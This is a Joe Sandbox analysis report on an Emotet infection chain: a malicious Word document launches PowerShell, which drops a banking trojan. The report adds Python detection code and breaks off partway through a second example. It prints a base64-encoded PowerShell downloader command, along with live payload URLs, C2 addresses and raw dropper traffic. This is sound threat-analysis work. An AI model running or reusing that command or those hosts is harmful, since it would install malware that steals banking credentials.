
Analysis Report http://leonfurniturestore.com/sec.myacc.resourses.biz/

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 785940
Start date: 12.02.2019
Start time: 20:11:38
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 8m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
Sample URL: http://leonfurniturestore.com/sec.myacc.resourses.biz/
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.bank.expl.evad.win@14/23@3/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 53% (good quality ratio 42.2%)
  • Quality average: 58.1%
  • Quality standard deviation: 37.3%
HCA Information:
  • Successful, ratio: 87%
  • Number of executed functions: 87
  • Number of non-executed functions: 189
Cookbook Comments:
  • Adjust boot time
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Detection
Threshold | 80    | 0 - 100 | Report FP / FN | false       | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Analysis Advice

Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts 1 | Command-Line Interface 1 | Valid Accounts 1 | Valid Accounts 1 | Valid Accounts 1 | Credential Dumping | Process Discovery 2 | Application Deployment Software | Data from Local System | Data Encrypted 2 | Standard Cryptographic Protocol 2
Replication Through Removable Media | Service Execution 1 | Modify Existing Service 1 | Process Injection 1 | Disabling Security Tools 1 | Network Sniffing | Security Software Discovery 2 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Non-Application Layer Protocol 4
Drive-by Compromise | PowerShell 4 | New Service 2 | New Service 2 | Process Injection 1 | Input Capture | Remote System Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Application Layer Protocol 4
Exploit Public-Facing Application | Exploitation for Client Execution 11 | System Firmware | DLL Search Order Hijacking | Deobfuscate/Decode Files or Information 1 | Credentials in Files | System Service Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information 1 | Account Manipulation | File and Directory Discovery 1 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | DLL Search Order Hijacking | Brute Force | System Information Discovery 22 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port

(A number after a technique name is the report's signature-hit counter for that cell, reproduced as shown; techniques without a number are the fixed matrix entries that had no hits in this analysis.)

Signature Overview



Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\810.exe; Code function: 7_2_00112089 CryptExportKey,7_2_00112089
Source: C:\Users\user\810.exe; Code function: 7_2_001120E5 CryptAcquireContextW,7_2_001120E5
Source: C:\Users\user\810.exe; Code function: 7_2_00112104 CryptReleaseContext,7_2_00112104
Source: C:\Users\user\810.exe; Code function: 7_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,7_2_00112125
Source: C:\Users\user\810.exe; Code function: 7_2_0011218B CryptGenKey,CryptDestroyKey,CryptReleaseContext,7_2_0011218B
Source: C:\Users\user\810.exe; Code function: 7_2_001121A9 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_001121A9
Source: C:\Users\user\810.exe; Code function: 7_2_00112217 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_00112217
Source: C:\Users\user\810.exe; Code function: 7_2_00112292 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_00112292
Source: C:\Users\user\810.exe; Code function: 7_2_0011233E RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_0011233E
Source: C:\Users\user\810.exe; Code function: 7_2_001123B0 CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_001123B0
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_001120E5 CryptAcquireContextW,9_2_001120E5
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00112104 CryptDecodeObjectEx,CryptReleaseContext,9_2_00112104
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00112089 CryptExportKey,9_2_00112089
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,9_2_00112125
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_0011218B CryptGenKey,CryptDestroyKey,CryptReleaseContext,9_2_0011218B
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_001121A9 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_001121A9
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00112217 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_00112217
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00112292 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_00112292
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_0011233E RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_0011233E
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_001123B0 CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_001123B0

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential browser exploit detected (process start blacklist hit)
Source: C:\Program Files\Internet Explorer\iexplore.exe; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Networking:

Connects to IPs without corresponding DNS lookups
Source: unknown; TCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknown; TCP traffic detected without corresponding DNS query: 181.15.224.57
HTTP GET or POST without a user agent
Source: global traffic; HTTP traffic detected:
    GET /9onrkqJ HTTP/1.1
    Host: borsacat.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /9onrkqJ/ HTTP/1.1
    Host: borsacat.com
Contains functionality to download additional files from the internet
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00111679 HttpQueryInfoW,GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,9_2_00111679
Downloads files
Source: C:\Program Files\Internet Explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low
Downloads files from webservers via HTTP
Source: global traffic; HTTP traffic detected:
    GET /sec.myacc.resourses.biz/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: leonfurniturestore.com
    DNT: 1
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /9onrkqJ HTTP/1.1
    Host: borsacat.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /9onrkqJ/ HTTP/1.1
    Host: borsacat.com
Source: global traffic; HTTP traffic detected:
    GET / HTTP/1.1
    Cookie: 55193=HoTC9DGe9+F8n6zBTTuy+GWHm63lQSxcmAlGva3Kao04L64CnsGpcFMQIpsoIeOaWtHQuDMyxaXSDx1wPhNwdOm3OEfCNoSKj9RgMXnR3WTr+QwWzfnMGmbSg9hdXtbVDOmnf7WTrIDGPrSXQxJgUyScIjhAKBaaJC/11D+B+Y9jm379ECkn78pv6/zOXqZ/1oYa+5OLkVkU0lqyuBaiY2a0PDmNKWybkJPv7DhC/8qnKqUOrKKvCbTJSTXugxvsqoGHX7vUeSuyFaVfDTThr6ToCd9mmlS6Gy1PvZJKfMunlupwXJ6GASeAuCeUy3/pD2ez2xZDOO2P87McYuTRMr1S6bl7OkfQ6fVVO8nAG8pOfMuJI9zARL54B7LfNoaZx5LhOl4RV0Qi/6mrfmVbSz+HX5hnU66i8oLMzRBbcmbJAfpe
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 181.15.224.57
    Connection: Keep-Alive
    Cache-Control: no-cache
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: leonfurniturestore.com
Posts data to webserver
Source: unknown; HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Tue, 12 Feb 2019 19:13:02 GMT
    Server: Apache
    X-Powered-By: PHP/5.6.37
    Expires: Tue, 01 Jan 1970 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Disposition: attachment; filename="lmZBvQit.exe"
    Content-Transfer-Encoding: binary
    Last-Modified: Tue, 12 Feb 2019 19:13:02 GMT
    Vary: Accept-Encoding,User-Agent
    Transfer-Encoding: chunked
    Content-Type: application/octet-stream
    Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 9c a8 14 9e fd c6 47 9e fd c6 47 9e fd c6 47 97 85 55 47 91 fd c6 47 9e fd c7 47 86 fd c6 47 9e fd c6 47 9f fd c6 47 93 af 1d
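The exchanges above carry four traits an analyst would turn into network detections: a GET with no User-Agent header (the borsacat.com requests), a request to an IP-literal Host carrying an oversized Cookie (the 181.15.224.57 request), an application/octet-stream response served as an .exe attachment whose chunked body starts with the MZ header (the lmZBvQit.exe download), and TCP peers that never appeared in a DNS answer (the "Connects to IPs without corresponding DNS lookups" entries). The Python below is an added example, not part of the Joe Sandbox report: the messages are constructed to mirror the ones listed here (the cookie value is a shortened stand-in and the body stops after the first PE bytes), and because the report does not list the resolved address of leonfurniturestore.com, a documentation-range address (203.0.113.10) is assumed for it.

```python
import re
from ipaddress import ip_address

# Constructed messages mirroring the report's exchanges (cookie shortened,
# response body cut after the first bytes of the PE header).
REQ_NO_UA = b"GET /9onrkqJ HTTP/1.1\r\nHost: borsacat.com\r\nConnection: Keep-Alive\r\n\r\n"
REQ_BROWSER = (
    b"GET /sec.myacc.resourses.biz/ HTTP/1.1\r\n"
    b"Accept: text/html, application/xhtml+xml, */*\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Host: leonfurniturestore.com\r\nConnection: Keep-Alive\r\n\r\n"
)
REQ_C2 = (
    b"GET / HTTP/1.1\r\nCookie: 55193=" + b"HoTC9DGe9" * 40 + b"\r\n"
    + b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)\r\n"
    + b"Host: 181.15.224.57\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
)
RESP_DROPPER = (
    b"HTTP/1.1 200 OK\r\nServer: Apache\r\nX-Powered-By: PHP/5.6.37\r\n"
    b'Content-Disposition: attachment; filename="lmZBvQit.exe"\r\n'
    b"Transfer-Encoding: chunked\r\nContent-Type: application/octet-stream\r\n\r\n"
    b"4000\r\nMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
)
# Constructed: the report lists the TCP peers but not the resolved address of
# leonfurniturestore.com, so a documentation-range address stands in for it.
DNS_ANSWERS = {"leonfurniturestore.com": {"203.0.113.10"}}
TCP_DESTINATIONS = ["203.0.113.10", "184.101.191.86", "181.15.224.57"]


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_ip_literal(host):
    """True when the Host header is a bare IPv4/IPv6 address (optionally with :port)."""
    try:
        ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def request_findings(raw, max_cookie_len=256):
    """Header-level traits of a client request that the report's signatures flag."""
    _, h, _ = parse_http(raw)
    findings = []
    if "user-agent" not in h:
        findings.append("no-user-agent")
    if is_ip_literal(h.get("host", "")):
        findings.append("ip-literal-host")
    if len(h.get("cookie", "")) > max_cookie_len:  # threshold is an assumption
        findings.append("oversized-cookie")
    return findings


def response_findings(raw):
    """Traits of a response that delivered the dropper: an .exe attachment and an MZ body."""
    _, h, body = parse_http(raw)
    findings = []
    m = re.search(r'filename="?([^";]+)', h.get("content-disposition", ""), re.I)
    if m and m.group(1).lower().endswith(".exe"):
        findings.append("executable-attachment")
    if "chunked" in h.get("transfer-encoding", "").lower():
        # the first line of a chunked body is the chunk size ("4000"), not payload
        body = body.split(b"\r\n", 1)[1] if b"\r\n" in body else b""
    if body.startswith(b"MZ"):
        findings.append("mz-body")
    return findings


def destinations_without_dns(tcp_destinations, dns_answers):
    """TCP peers that never appeared in a DNS answer (hard-coded C2 addresses)."""
    resolved = set()
    for addresses in dns_answers.values():
        resolved |= set(addresses)
    return {ip for ip in tcp_destinations if ip not in resolved}


if __name__ == "__main__":
    for req in (REQ_NO_UA, REQ_BROWSER, REQ_C2):
        print(parse_http(req)[0], request_findings(req))
    print(parse_http(RESP_DROPPER)[0], response_findings(RESP_DROPPER))
    print("no DNS:", sorted(destinations_without_dns(TCP_DESTINATIONS, DNS_ANSWERS)))
```

The cookie threshold and the IP-literal check are heuristics: legitimate software does talk to bare addresses and does set long cookies, so in production these feed a score together with the missing User-Agent and the MZ-in-attachment response rather than alerting on their own.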
Urls found in memory or binary data
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://borsacat.H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://borsacat.cH
Source: powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmp; String found in binary or memory: http://borsacat.com
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://borsacat.com/9onrH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://borsacat.com/9onrkqH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp, powershell.exe, 00000004.00000002.1665256686.00215000.00000004.sdmp; String found in binary or memory: http://borsacat.com/9onrkqJ
Source: powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmp; String found in binary or memory: http://borsacat.com/9onrkqJ/H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://borsacat.com/9onrkqJH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://borsacat.comh%
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://chileven.com/YAsyH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://chileven.com/YAsyS0Mslz
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://chileven.com/YAsyS0MslzH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://chileven.com/YAsySH
Source: 77EC63BDA74BD0D0E0426DC8F8008506.1.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://fatrecipesdoc.com/I20cH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://fatrecipesdoc.com/I20clH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://fatrecipesdoc.com/I20clMx8
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://fatrecipesdoc.com/I20clMx8H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://huyushop.com/P2ryBfybD
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://huyushop.com/P2ryBfybDH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://huyushop.comH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://idjvn.H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://idjvn.com/eUBrJH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://idjvn.com/eUBrJig7
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp; String found in binary or memory: http://idjvn.com/eUH
Source: sec.myacc.resourses[1].htm.1.dr; String found in binary or memory: https://www.leonfurniturestore.com/sec.myacc.resourses.biz/
Uses HTTPS
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown; Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49235 -> 443

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Users\user\810.exe; Code function: 7_2_0011CF86
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_0011CF86

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\810.exe; Code function: 7_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,7_2_00112125
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,9_2_00112125

System Summary:

Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Network Connect: 185.2.4.75 80
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\810.exe
Contains functionality to call native functions
Source: C:\Users\user\810.exe; Code function: 6_2_003E21B8 NtAllocateVirtualMemory,6_2_003E21B8
Source: C:\Users\user\810.exe; Code function: 6_2_003E20FD NtProtectVirtualMemory,6_2_003E20FD
Source: C:\Users\user\810.exe; Code function: 7_2_000F21B8 NtAllocateVirtualMemory,7_2_000F21B8
Source: C:\Users\user\810.exe; Code function: 7_2_000F20FD NtProtectVirtualMemory,7_2_000F20FD
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002821B8 NtAllocateVirtualMemory,8_2_002821B8
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002820FD NtProtectVirtualMemory,8_2_002820FD
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_000F21B8 NtAllocateVirtualMemory,9_2_000F21B8
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_000F20FD NtProtectVirtualMemory,9_2_000F20FD
Contains functionality to delete services
Source: C:\Users\user\810.exe; Code function: 7_2_0011FD10 _snwprintf,GetProcessHeap,HeapFree,OpenServiceW,DeleteService,CloseServiceHandle,7_2_0011FD10
Contains functionality to launch a process as a different user
Source: C:\Users\user\810.exe; Code function: 7_2_00111F72 CreateProcessAsUserW,7_2_00111F72
Creates mutexes
Source: C:\Windows\System32\startedradar.exe; Mutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\startedradar.exe; Mutant created: \BaseNamedObjects\PEMEC8
Source: C:\Users\user\810.exe; Mutant created: \Sessions\2\BaseNamedObjects\PEMD40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\startedradar.exe; Mutant created: \BaseNamedObjects\PEM198
Source: C:\Users\user\810.exe; Mutant created: \Sessions\2\BaseNamedObjects\PEM5E8
Source: C:\Users\user\810.exe; Mutant created: \Sessions\2\BaseNamedObjects\Global\M3C4E0000
Source: C:\Users\user\810.exe; Mutant created: \Sessions\2\BaseNamedObjects\Global\I3C4E0000
Detected potential crypto function
Source: C:\Users\user\810.exe; Code function: 6_2_00D03535
Source: C:\Users\user\810.exe; Code function: 6_2_004053DF
Source: C:\Users\user\810.exe; Code function: 6_1_00D03535
Source: C:\Users\user\810.exe; Code function: 7_2_001153DF
Source: C:\Windows\System32\startedradar.exe; Code function: 8_2_002A53DF
Source: C:\Windows\System32\startedradar.exe; Code function: 9_2_001153DF
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\startedradar.exe; File read: C:\Windows\System32\drivers\etc\hosts
Classification label
Source: classification engine; Classification label: mal80.bank.expl.evad.win@14/23@3/4
Contains functionality to create services
Source: C:\Users\user\810.exe; Code function: _snwprintf,GetProcessHeap,HeapFree,CreateServiceW,CloseServiceHandle,7_2_0011FDC9
Source: C:\Windows\System32\startedradar.exe; Code function: _snwprintf,GetProcessHeap,HeapFree,CreateServiceW,CloseServiceHandle,9_2_0011FDC9
Contains functionality to enum processes or threads
Source: C:\Users\user\810.exe; Code function: 6_2_00401BF0 CreateToolhelp32Snapshot,6_2_00401BF0
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\810.exe; Code function: 7_2_0011FE54 ChangeServiceConfig2W,GetProcessHeap,HeapFree,7_2_0011FE54
Creates files inside the user directory
Source: C:\Program Files\Internet Explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Low
Creates temporary files
Source: C:\Program Files\Internet Explorer\iexplore.exe; File created: C:\Users\user~1\AppData\Local\Temp\~DFEA1CECCC785180E5.TMP
Parts of this application use the .NET runtime (probably coded in C#). Note that the process in question is powershell.exe, which is itself a .NET host, so these assembly loads are expected for any PowerShell process.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Internet Explorer\iexplore.exe; File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown; Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown; Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: unknown; Process created: C:\Users\user\810.exe 'C:\Users\user\810.exe'
Source: unknown; Process created: C:\Users\user\810.exe C:\Users\user\810.exe
Source: unknown; Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Source: unknown; Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Source: C:\Program Files\Internet Explorer\iexplore.exe; Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\810.exe 'C:\Users\user\810.exe'
Source: C:\Users\user\810.exe; Process created: C:\Users\user\810.exe C:\Users\user\810.exe
Source: C:\Windows\System32\startedradar.exe; Process created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
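Read together, the process-creation entries above form one chain: iexplore.exe opens the downloaded eFILE_201902123164.doc in WINWORD.EXE, Word launches powershell.exe with an encoded command, PowerShell drops and runs C:\Users\user\810.exe, which re-executes itself and is then found running as C:\Windows\System32\startedradar.exe. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds that lineage from Sysmon-style process-creation events and applies the rules an analyst would derive from this page (browser spawning an Office application, Office spawning a script host, PowerShell given an encoded command under any of its accepted abbreviations, and a System32 binary whose parent runs from a user profile). The events are constructed to mirror the report's entries; the pids are made up.

```python
import ntpath
import re

# Constructed process-creation events (pids are made up) that mirror the
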